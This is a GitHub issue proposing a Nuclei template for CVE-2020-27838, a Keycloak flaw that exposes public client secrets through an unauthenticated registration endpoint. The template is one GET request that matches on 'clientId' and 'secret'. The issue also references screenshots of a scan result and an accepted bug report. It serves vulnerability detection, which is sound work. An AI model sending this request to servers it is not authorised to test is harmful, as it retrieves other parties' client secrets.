### ISSUE TITLE
CVE-2020-27838

### ISSUE THREAD

**Issue by mchklt** [projectdiscovery/nuclei-templates#8946]
### Template Information:

A flaw was found in keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication which could be an issue if the same PUBLIC client changed to CONFIDENTIAL later. The highest threat from this vulnerability is to data confidentiality.

### Nuclei Template:

```yaml
id: CVE-2020-27838

info:
  name: CVE-2020-27838
  author: mchklt
  severity: medium
  description: |
    This template checks for the presence of the Security Admin Console vulnerability (CVE-2020-27838) in the /auth/realms/master/clients-registrations/default/security-admin-console path with a response status of 200.

requests:
  - method: GET
    path:
      - "{{BaseURL}}/auth/realms/master/clients-registrations/default/security-admin-console"
      
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "security-admin-console"
          - "clientId"
          - "secret"
      - type: status
        status:
          - 200
```
#### Nuclei Result

![Screenshot from 2024-01-15 18-22-49](https://github.com/projectdiscovery/nuclei-templates/assets/53612008/8c1a3e28-8ba7-44ea-a7e1-5c21fc233eaf)

#### Valid Bug accepted

![Screenshot from 2024-01-15 18-21-06](https://github.com/projectdiscovery/nuclei-templates/assets/53612008/569f913a-e464-430d-8852-2b88594ad2f6)
